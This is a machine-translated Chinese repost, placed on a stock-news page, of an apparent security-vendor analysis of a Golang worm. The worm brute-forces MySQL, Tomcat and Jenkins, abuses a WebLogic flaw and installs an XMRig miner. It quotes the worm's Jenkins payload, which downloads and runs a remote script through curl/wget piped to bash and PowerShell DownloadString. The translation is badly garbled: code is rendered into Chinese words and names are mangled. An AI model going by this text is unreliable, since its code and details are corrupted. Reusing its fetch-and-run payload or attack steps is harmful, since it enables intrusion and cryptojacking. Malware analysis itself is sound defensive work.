新的Golang蠕虫在服务器上投放病毒 929

股票资讯  2021-03-06 11:30:58

原标题:新戈朗蠕虫病毒放在服务器上

译者:了解于闯404实验室翻译组

原文链接:https://www . intezer . com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/

介绍 12月初,我们发现了一个用Golang写的新蠕虫。这个蠕虫延续了2020年Golang流行多平台恶意软件的趋势。

蠕虫试图在网络中传播,以便大规模运行XMRig Miner。恶意软件既针对Windows服务器,也针对Linux服务器,很容易从一个平台转移到另一个平台。它的目标是服务大众:弱密码MySQL,Tomcat管理面板,Jenkins。在旧版本中,蠕虫还试图利用WebLogic的最新漏洞:CVE-2020-14882。

在我们的分析过程中,攻击者不断更新C & ampc服务器上的蠕虫。这表明该蠕虫处于活动状态,并可能在未来的更新中以其他配置不佳的服务为目标。

技术分析 攻击使用三个文件:一个删除脚本(bash或powershell),一个Golang二进制蠕虫和一个XMRig Miner,所有这些都托管在同一个C & amp向上。

目前还没有检测到ELF蠕虫二进制文件和bash dropper脚本。

图1显示了病毒总数中ELF蠕虫的二进制检测结果。

图1:在virus total(EAD 2 cf 8 ab 7 AEF 63706 b 40 EB 57d 668d 0a)中未检测到ELF文件

这种恶意软件在Linux和Windows操作系统上表现相似。我们将在下面描述Linux蠕虫感染过程。

Linux蠕虫感染过程 执行后,蠕虫会检查受感染计算机上的进程是否正在侦听端口52013。此端口上存在的侦听器可以充当恶意软件的互斥体。如果此端口的套接字已经打开,实例将退出,否则它将打开此端口上的网络套接字。

在旧版本中,蠕虫将XMRig Miner作为Network01提取到tmp文件夹中并运行它。使用名为go-bindata的Go资源嵌入包将矿工嵌入到Golang二进制文件中。恶意软件使用bindataFile函数对嵌入的XMRig Miner二进制文件进行解压缩。图2显示了这个文件中的函数。

figure 2:xmrig ulinux uamd 64 . go文件

恶意软件会利用TCP-SYN对网络进行扫描,以便找到它能够暴力攻击并在网络上传播的服务。它会在与这些服务相关的开放端口上扫描IP:8080(针对Tomcat和Jenkins)、3306(针对MySQL)和7001(针对WebLogic)在旧版本的蠕虫上。这些漏洞都有一个src“exp”(漏洞)代码包。

图3: exp文件和函数

蠕虫使用Gopacket库,该库为go使用libpcap读取网络数据包提供c绑定。通过运行pcapc,蠕虫可以获得用于收集ACKS的网络数据,并继续暴力破解服务。图4显示了在Tomcat和MySQL服务上对蠕虫的强力破解和利用。

图worm输出的片段

攻击后,恶意软件会提供加载器脚本:ld.sh(Linux)和ld.ps1(Windows)。加载程序负责删除和运行所用服务上的XMRig Miner和Golang蠕虫。图5和图6中的加载器脚本如下:

图5:基于Linux的ldr.sh-Dropper bash脚本

figure 6: ldr.ps1 ——基于Windows的Dropper powershell脚本

攻击过程 下面描述每个服务的攻击流程。

MySQL:端口3306

该恶意软件将进行暴力攻击。恶意软件使用包含弱凭据(例如,root:123456)的硬编码字典来执行此攻击。

成功登录后,它将运行一个shellcode,使用mysql UDF获得本地权限升级。漏洞利用程序以十六进制字符串的形式嵌入到二进制文件中。该蠕虫用于每个操作系统和体系结构(UDFLINUX32、UDFLINUX64、UDFLWIN32和UDFWIN64)。浏览此处了解有关漏洞利用的更多信息。

运行利用程序后,有效负载将使用sys_exec命令删除并运行加载程序脚本。URLWIN和URLLINUX存储删除程序脚本的URL。图7和图8显示了每个操作系统的负载。

图7: MySQL查询-Linux负载

figure 8: MySQL查询-windows负载

Tomcat:8080端口

恶意软件将使用基本身份验证在管理面板上运行凭据。

图9:9的身份验证请求示例:Tomcat管理面板

成功试用后,恶意软件将尝试部署一个WAR文件(网络应用程序资源),该文件将用于传输包含恶意有效负载的1.jsp文件。

恶意软件将发送获取请求并解析参数%s/1.jsp?win = % s & amplinux=%s .这些参数将包含下载脚本的网址。然后,jsp脚本将删除并运行加载程序。

图10:1.jsp文件脚本

詹金斯:8080端口

与以前的攻击类似,恶意软件暴力破解了詹金斯密码,登录并运行了以下负载:

新对象网。WebClient)。DownloadString(“% s”)!bash @-c @(curl-FSsl % s | | wget-q-O –% s)| bash

println“% s”+“% s”;def s =新字符串(。getDecoder()。解码(“% s”+“% s”。反向()))。拆分("!");def c = System . GetProperty(" OS . name ")。包含(" indo ")?s

返回搜狐查看更多内容

负责编辑:


以上就是新的Golang蠕虫在服务器上投放病毒929的全部内容了,喜欢我们网站的可以继续关注琦媛股票网其他的资讯!

相关推荐

菲律宾股指跌幅扩大至2.9%
菲律宾股票指数跌幅扩大至2.9%25。(来源:东方财富研究中心)...
台积电(TSM.US)扬起旗帜,谁是高级包装大战的赢家?
app独占:对主要资金进行逐案监视%26gt;%26gt;"包装和测试工厂拥有台积电(TSM.US)的于振华在2011年对媒体说...
创业板IPO|伟特突破创业板,存款毛利率波动、应收账款坏账等风险
3月2日,首都国都获悉,深圳市维特欧新材料股份有限公司(以下简称"维特欧")创业板IPO已获深交所受理。本次发行上市的保荐机构为...
中金:检测领域政策频出,二季度疫苗接种率有望继续提升,医疗ETF(512170)涨幅超1.5%
今日两市低开后回升。医药板块早盘低开高走。血糖监测龙头三诺领涨12%2525,昊海生物25涨4.9%25,盈康生命涨1.7%25...
002001基金净值查询今日最新净值宜春期货基金哪个集资公司服务好_
002001基金净值查询衡水资金配置公司现在哪些公司比较正规可靠?股票是当今社会最受欢迎的金融产品,这也是由其自身的优势决定的。...
奔驰爷爷“断臂”自救
奔驰爷爷自己拆最近熟悉的奔驰车忙着拆自己。应股东要求,2021年2月3日,奔驰品牌所有者戴姆勒宣布重大战略调整。戴姆勒汽车和卡车...
国内光刻胶制造商恒坤计划终止新三板上市
2月6日,根据恒坤股份有限公司近日发布的公告,厦门恒坤新材料科技有限公司基于自身业务发展需要和战略发展规划需要,经过慎重考虑,拟...
金牛期货创业板股票购买流程
金牛期货创业板股票购买流程一、投资者应尽可能了解创业板的特点和风险,客观评估自身的风险承受能力,慎重决定是否申请开通创业板市场交...
湖北银行2020年固定利率信托计划收益、资产信托计划
2020年固定利率的湖北银行最好的融资平台是什么?首先我们来介绍一下资金配置的情况。资本配置是投资者利用杠杆扩大资本和收入的一种...

友情链接